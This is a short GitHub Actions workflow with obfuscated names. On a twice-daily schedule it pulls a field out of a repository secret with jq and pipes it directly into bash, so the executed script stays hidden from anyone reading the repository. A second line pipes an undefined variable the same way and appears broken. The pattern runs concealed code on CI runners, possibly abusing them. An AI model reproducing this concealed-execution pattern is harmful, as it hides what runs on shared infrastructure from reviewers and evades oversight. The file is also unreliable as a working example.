name: xiangguanxueying

on:
  workflow_dispatch:
  schedule:
    - cron: '49 10,22 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: xiangguanxueying
        env:
          lfduv3: ${{ secrets.lfduv3 }}
        run: |
          printf '%s' "$lfduv3" | jq -r .rfsi87581 | /bin/bash
          printf '%s' "$vn4201" | jq -r .o0 | /bin/bash

